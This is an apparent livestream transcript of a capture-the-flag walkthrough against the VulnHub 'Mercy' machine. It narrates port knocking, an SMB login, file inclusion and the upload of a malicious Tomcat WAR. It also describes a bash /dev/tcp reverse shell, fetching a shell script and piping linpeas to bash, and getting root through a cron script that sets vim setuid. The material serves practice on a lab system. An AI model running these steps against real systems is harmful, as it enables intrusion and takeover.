192.168.48.134. And try looking up who the server thinks localhost is. It says localhost. We can try 002. Don't really get anything. So I'm trying to get the box to cough up its host name. If it coughs up its host name, we may be able to do a zone transfer or something. We do see port 22 is filtered. So I'm guessing there may be some type of port knocking, because VulnHub likes doing port knocks, and it being filtered means it's behaving differently. 80 is also filtered. Curl this. So both of those are filtered. We have pop, which is unique. So it's got some type of mail. /8080 is Tomcat. So let's go over to 192.168.48. Let's just close a bunch of these tabs. Come on. My VM's hung right now. I'm probably going to restart Burp Suite. I bet that's eating up all the memory on my VM. Or I may reboot this VM. Okay. That'll probably be better. So 192.168.48.134, and we wanted to go port 8080. Let's see. We get Tomcat, and robots.txt gave us /tryharder try harder. So let's check this out. Thank you, Ricket. And it looks like we get a bunch of base64. So let's check what this is. Echo-n base64-d. I'm just going to echo again. Let's see. Cyber hygiene is extremely important. Stop setting silly passwords that will get cracked with any decent password list. Once we found the password, quite literally, on a post-it note in front of an employee's desk. As silly as it may be, the employee pleaded mercy when we threatened to fire her. So what I'm going to try to do is log into SMB with that QIU user. So SMB client, let's go back here. And I think it's -U. Let's just try username password as this. Password, it works. So what do we get from this? .bash rc, bash history is 163. So let's get this file. So we can exit. And then we cat.bash history. And let's see. Home, QIU, .secrets. Open Sesame, so this is looking like a port knock. Thank you, Zero Day. Thank you, some guy in Sandy, for all their donations. So, gonna try this. Type the password as password again. Can we do cd ... to get out of this? Doesn't look like we can. There is a .private directory. And this is where everything is. So, let's do git readme.txt, cd secrets, nothing, cd open sesame, git config print, git config, and we got a few files to go through. This is for your eyes only. If we cat config, this looks like the SMB config. So let's see. Open HTTP. So here's the port knock sequence. So 159.27391.4. So let's try this. We'll do NC 192.168.48.134, 159. Then we'll do 27391, and then 4. And now we will curl it, and we get a website. Awesome. So let's go here. This machine shall make you plead for mercy. That's annoying. /QIU. Nothing. I was thinking I could get to his home directory. So what I'm going to do is start a GoBuster, because we always want to do some type of recon in the background. So GoBuster, dir for dir mode, http 192.168.48.134, -w for word list, user share word list, dirbuster, directory list 23 medium, -o for out. We'll call this GoBuster-root. /time. System time, time courtesy of Linux. Time equals 1. Nope. maybe time zone equals 1. So there may be some type of parameter on this time script to change the time zone that we may be able to exploit, but I don't know anything else yet. So let's take a look at what the rest of this config file is. We got OpenSSH, so we could try opening SSH and logging in with the QIU user. That sounds like it could be fun. So copy this. I think that's Raze who donated that time. So 192.168, what is it? 48.134, 173.01, 28504, and 9999. SSHQIU at that IP. Yes. Password of password. Don't get in. Password of QIU. We don't get anything as well. So nothing there. Here's the Apache config. Thank you, Lloyd, for the £2 donation, or €2. I don't actually know what that sign is. I get pounds and euros confused so much. Let's see, .ht access could be good. That'll probably be on a GoBuster. SMB config. Let's see, printers, QIU. So QIU is read-only in SMB, so we can't really drop files. Let's do config print. What is this? Settings, port knocking. Nothing too interesting there. There was one file I thought we got, but we didn't. Let's just organize a little bit. I'm making dir SMB and moving the files I downloaded via SMB to that directory. And we'll do SMB client-u QIU 192.168.48.134 / QIU. Password dir. If we go into private, open Sesame. Okay. Secrets. Nothing here. I'm not going to put my command history, wreck it. Let's see. It only showed time. So now I'm doing a PHP search. Let's see. Is it slash, probably slash manager for Tomcat? Is it admin, Tomcat, admin Tomcat? Let's search Tomcat default password. Looks like when I was fooling around with my network settings, I got rid of the DNS entry. So admin, Tomcat, manager, manager. We can try those. Admin, Tomcat, manager, manager, Tomcat, S3CRET, QIU, password. Let's see. What percentage are you done with this box? I've never done this box, so I don't know. Let's see. Apache 247. Actually, now that we have 22 open, we can probably get what OS this is. Let's see. What Ubuntu is this? Oh, this is Ubuntu Trusty. Trusty's pretty old. Let's see. Shellshock POC. Come on. I guess we can just do shellshocker.py. User agent. Sure. This looks fine. So I don't think it is Shellshock. Let's see, user bin sleep. So probably not Shellshock. Let's see, there is mail. So do we have Thunderbird installed? Apt install Thunderbird. Since pop was also on this, if we look, I have a note to check the mail. So I'm going to install Thunderbird and see if we can log into his mailbox and see if we can pull emails. And then I guess while we do this, we should run nmap again. So nmap-p 2280, because these are the two ports that we have opened after port knocking. SC, SV, OA, nmap. Actually, let's just do them all again. 192, 168, 48, 134. Let's just do all the ports. It didn't take that long. I like having one big nmap file that's clean. So let's see. Do we have Thunderbird installed now? Sure. Open up Thunderbird. Let's see. QIU at 192.168.30. What is the IP? 48.134. Password of password. Log in. Let's see. Incoming IMAP. This will be POP3 because POP was open. I don't think IMAP was. Retest. Doesn't look like this works. Let's see. Do I do these things at night or whenever I feel like doing the box? Probably whenever I feel like. While everyone's stuck at home over the week, I decided I just stream Saturday nights because it's not like we can be going out anyways. Let's see. Tomcat S3CRET. Nope. I'm waiting for this nmap to finish right now. Let's see. Did GoBuster PHP have anything? Just time and server status. Let's see. Shellshock didn't have anything. Let's look at all ports. So we're doing 80 and 22 now. It does have IMAP. We tried brute forcing our way into 8080. That didn't work. Let's see. SMB stuff. I guess we could try ESXi host. And we'll do 192.168.48.134. And this will be Mercy, because that's the host name. Just go to Mercy. HTTP. Mercy. Same thing. Let's see, what else is in the nmap? Let's see, Tomcat. Nothing too interesting. Is port 8009 open? The AJP port? We may be able to do something interesting with that. All ports. 8009 is not open. Oh, there's a robots.txt. I guess that directory list doesn't have robots.txt in it. Robots.txt, disallow /mercy and no mercy. Mercy, index. Plead for mercy too much. Please help us upgrade our website. No mercy. Rips. Searchboit. Rips. Let's see. LFI. Exploit-M to mirror. Let's look at what this is. Let's see. Code.php. Sweet. Let's try this. Windows code.php. Copy. Instead of index.php, let's try etc passwd. And we got LFI. Sweet. So let's see. Fluffy, super long user, plead for mercy. V users.text. Actually, let's put these. We can do it users here. Plead for mercy. QIU. Okay. This is a Linux box, so Eternal Blue won't work at all. So what other things can we get? Let's see. Let's look at time. Var www HTML time. Let's see, Sunday, April 5th. That is today's time. I wonder if we can do, I wonder if that's a PHP script. And this LFI is executing code. PHP filter convert dot base 64 dash encode slash resource is equal to that. Awesome. Let's view the source. I was hoping the source would be easier to copy. Echo-n, paste, base 64-d. Let's get rid of this one space. So that's not that. Let's see. Let's go back in SMB. Config. Oh. I know what we can do. We can go into port 8080 and probably take the Tomcat users. So let's try this. Please don't put spoilers in the chat or something. Let's try this. Echo-n, base 64-d. Sweet. So we have a few users. Let's try SSHing with them. 168, 48, 134. Fail to ban is pretty effective. Fluffy. Nothing, but I guess we can upload a malicious Java file to this Tomcat. So let's go to Tomcat. Let's see. Manage a web app. Super duper long user. And we'll put the password. There we go. So now we just have to create a WAR file. So let's see. We'll go to the chat. Do we do MSF Venom or Google how to do this manually? So we're seeing what people want to do right now. Let's see, MSF Venom -- list. Is it -- payloads list? Or -L? -P -L. One Venom. Venom. Okay. Most people saying Venom. Now most people saying Google. Someone wants to cake and eat it too, saying both. Eventually, I want to sleep, so I probably won't do both. I was screwing up that MS Venom command anyways, so let's do create malicious war file. And I gotta give myself the name server. I wonder how many guides it takes me to find one that's not doing Metasploit. Let's see. Another one using Metasploit. Let's see. Payload all the things. Let's try this. Let's see. I should have this on my box. Find.grep-i war. Java. Tomcat. Maybe it's not on payload all the things. Let's just create this payload and see what it's doing. So we're going to create this war file using MSF Venom, and then we're going to extract it and analyze exactly what it does. So we got shell.war. War files are just zips. So make dir analyze. And all this command did was MSF Venom, the payload Java JSP shell reverse TCP, and we have to change lhost and lport eventually. But I just wanted to analyze it. So it's going to create a JSP file. And if we do opt payload all the things, find.grep-jsp -i-JSP, don't see it. So let's look at what this JSP file is. So let's see. It's importing the Java libraries, and then this is creating a network stack, the stream connector. And then if Windows, if it is not Windows, the string is going to be bin sh. If it is Windows, it's going to be cmd.exe, and then it's going to create the reverse shell to this IP. So if we go into webinf, what is this? Web.xml. It's just the welcome file list. So let's Google JSP shell to see if we can make it execute a command. Simple JSP shell. See, this is using Windows. I don't want Windows. I'm just going to edit my network real quick. IPv4. DNS is there. DNS is there. Etsy resolve.conf. Name server. chmod or chattr. Is it -i? Oh, it changed it before I even could do that. Is it +i to make it immutable? There we go. We can no longer write this file. So nothing will be changing it back. So I made a typo when I did that. There we go. We can probably use this one. Get runtime. Let's see what this does. So we're going to edit this. Set paste. Paste this JSP shell. And then if we remove shell.war, let's see. File. It's just a zip. So let's do maybe zip. Analyze star. Analyze.zip. Okay. We probably have to do -r for recursive. There we go. So we added the web XML. So let's just upload this new war file that we created and see if it works. Was it that easy to create? Root. Vulnhub. Thank you, Lloyd, for the donation. Analyze.zip. Deploy. It must be a war. So we upload this. And let's see if it works. 404. Let's see. Make dir temp. I think it's because we have the parent directory up here. So unzip this. Yeah, so let's try going in this directory. Zip -r. Analyze.zip. On a current self. So now we no longer have a parent directory before that. Okay, let's go back. We can undeploy, browse, upload, who am I? And we can do a command. So there you go. You kind of got both. You got MSF Venom generating over a shell and then editing that shell, putting a command in it or a different shell. And yeah. So you kind of got the best of both worlds there, I guess. So we'll do --c, --i to get a reverse shell. Dev TCP 192.168 if config eth0 eth1. And then we'll do port 9001. That is the command I just ran. So, or I'm going to run. Let's see, --i dev TCP. Doesn't look like it worked. Let's see. Shell cheat sheet. Python, PHP. Let's do this one. Let's see. Paste it here first. We want to change this to 192.168.48.132, 9001. Copy. Send. And it looks like there may be IP tables or something on. Let's do find /grep-i IP table. Where am I? /etc type f. It looks like there may be some like bad characters, because that grep didn't work. So it may be the shell. Let's see. I don't see anything on output. So I think it's the shell actually. So let's do make dir dub. And then we can do, let's see, which curl? Do we have it? We do. V shell.sh. --c, --i. Let's just make sure we get this correct. I think I was typing it correct before, but never know. Okay. 192.168.48.132, 9001. Config eth1. That looks correct. Now we can just do Python 3-m http.server. And then we go back here, curl 192.168.48.132, 8000 curl.sh. Was it shell.sh? Okay. -o dev shm shell.sh. And we can do bash dev shm shell.sh. I think I just saved. Let's see. Yeah, I saved curl.sh. Darn it. Shell.sh. This is why I normally do this part in Burp Suite. Cat dev shm shell.sh bash dev shm shell.sh. And we finally got a shell back. So now let's begin the PrivEsc. But before that, python-c import pty, pty.spawn bin bash stty raw minus echo fg. So now let's see. cd etsy ssh less ssh d underscore config. So what I'm doing right now is I want to see if there's any like deny user commands, because if it's denying like that this is a super duper long user, then I know to try like su on that. So it doesn't look like that works. Let's see. What else should we look at? I guess we can run linps. So let's cp opt privilege escalation awesome suite linps.sh and to dub and then curl 192.168.48.134 8000 linps.sh, pipe it over to bash. 132. Not found. I must have a typo. Copy, paste. There we go. So now it is looking. I saw a password.txt. I want to find that real quick. Home, this is super duper long user password.txt. Try harder. Is that actually his password? Or is that taunting me? I don't know. Let's try. su dash, this is a super duper long user. Authentication failure. Just in case I typed this wrong, let's take that doubt out. Yes, I prefer linps over linenum because it does color coding. So that's not the password. Let's do a search and see what we have. So we could do a kernel exploit against this. So, but this is probably an old box. I hate doing kernel exploits. We can probably do that as an alternate path. But see if there's anything else. You should never take the easy route because then you lose track of what the person that created it was trying to teach you. Nocd. Let's see, Tomcat stuff. Postgres. So we may want to go into a database and look at passwords. So I'm just going to paste and look later. Cron jobs. It's odd that libvirt's on this box. Maybe it just got installed by default. For RFIs, you really have to go out of your way in today's age to make that a thing, because like PHP by default, I think disables RFI by default. So you have to edit in the config to allow it. Let's see. MySQL as well. I don't know what 8005 is. We get a lot of logins for Plead. Plead for Mercy logs in quite a bit. Are those today? No, those are old. I may use PSPy eventually. It's not one of the first things I do. I thought 8009 was AJP, not 8005. I could be wrong. Let's see. Verdubdub pub. See, Samba secrets. Looking at all these setuid files, it's looking like they are standard ones default. Nothing's really jumping out. Screen. 450, that's got a known one. If that's actually that version. I don't know if LinPiece is actually checking screen version. Let's see. Readable by me, but not word writable or word readable. Let's see. Backup files. Nothing interesting. Web files. We may want to look at how does time work. Passwords and logs. That's try harder. We already looked at that file. So we can try logging in with Fluffy. So su-fluffy. Paste the password. Oh, we got in. Added user Fluffy. Who am I? Sudo-l. Password, nothing. Find /-user Fluffy. To dev null. What files are on this box? cat dash bash history, nothing, dot private, cat secrets. It's in a directory. Backup.save. Echoing backup files. Time clock. Let's see. Root owns this, and it's completely executable. Let's see. touch/temp. Please subscribe. cd.secrets. cat.secrets. Try harder. Cat backup.save. V backup.save. touch/temp. Let's see. Thanks for the super chat donations. ls/temp. Just checking if either of those wrote. Let's do var dub HTML. LSLA. Time is only writable by data. Let's see. 5117. Cat Etsy cron tab. Let's try going to time. ls-la temp. Hey, we got please subscribe. So that was the time file, or not time. Back to home. Now is private, secrets. Time clock was please subscribe. So now we can just let's just go back and try a chmod on VI. So chmod plus s user bin VI. CD Etsy alternatives VI. Vim basic. So probably in a minute, or when we hit this page, that will become a set UID. Let's see, if we go back to Linux Kernel PrivEsc, and we go back to 2018, go to this one, root shell.c, and we can just copy this root shell. Do we have GCC? We do not. That hasn't ran yet. So let's do v shell.c set paste gcc shell.c -o www shell.out. Oh, we'll just call it shell. Still doesn't have that set UID bit. wget 192.168.132 8000 shell. Does this execute? chmod plus x shell. uname-a. This is 32-bit Ubuntu. Can you show how the box is executing the script as root? I don't know yet. So, can't drop that. It's probably just a cron job, though. I thought I did hit the time page. Hit. Hitting this a few times. LSLA, user bin, vim.basic. Oh, you do have to hit it. It must have been in cache. ID. We are now root. And we could do -m32 shell x32, maybe. I'd probably have to install the libraries to do that. The Mercy box is on VulnHub. So let's see. So there are a few things we wanted to do. Let's look at how that time thing works real quick. Let's do contab-l or verspool. Is it cron? cd cron tabs. Let's look at root. So every 3 minutes, this script gets hit. We probably could also hit this. LSLA. Nope, only root can do that one. So it wasn't hitting the web page. I just didn't give it long enough. So let's see. What else do we want to do? Let's look at screen. Screen-v 401. That's May 2006. So screen's a fun exploit. Searchploit screen. Let's see. Oh, this is going to want us to have GCC, isn't it? Let's see. Yeah. I'll have to install stuff to get 32-bit Ubuntu or something to get this one working. Let's see. Let's look at this file real quick. So Fluffy couldn't have read that. Only root can, so that's not a good one. For www.pub doesn't exist. Plead for mercy, probably not. MySQL. SQL-u root. Let's see, var www HTML. So anything that would be MySQL. Nothing there. No mercy config. Let's see, find dot grep-i user. pass MySQL, well, grep-r for recursive MySQL. Let's see, config. Let's see, maybe grep for password. Grep for 3306. Let's see. I'm not sure what MySQL's password's going to be. Let's see. PSQL Fluffy does not exist. So we have to figure out what is listening on Postgres. Maybe we aren't Fluffy. ID, we're still Fluffy. For Tomcat. Let's see. Let's do -writable-ls. We can't write to anything. So I was wondering if we could get a shell as www-data and then do it. We can try -U Postgres. Doesn't work. CD HTML, grep-r, what is it? 5432. Let's see. Config file. Can we read this? Less etsy PostgreSQL 9.3 main. I'm not sure. Let's just do the easy one and look at the kernel. 2016. It's going to be dirty cow, probably. The downside is I don't want to build a 32-bit Ubuntu or download the 32-bit stuff so I can compile on Kali right now because it's getting late. I'm sure I've done this on Hack the Box machines if you want to Google dirty cow and see how this works. But based upon the year, I'm guessing that's what it is. So take care, guys, and I will see you all next week, probably. Well, I will. I don't know if I'm going to stream next week, but I'll do a Hack the Box video, of course. So I'm going to switch this to the starting soon thing because there's a delay, I guess, on the chat. I'm going to give this a few minutes, and then I will end the stream.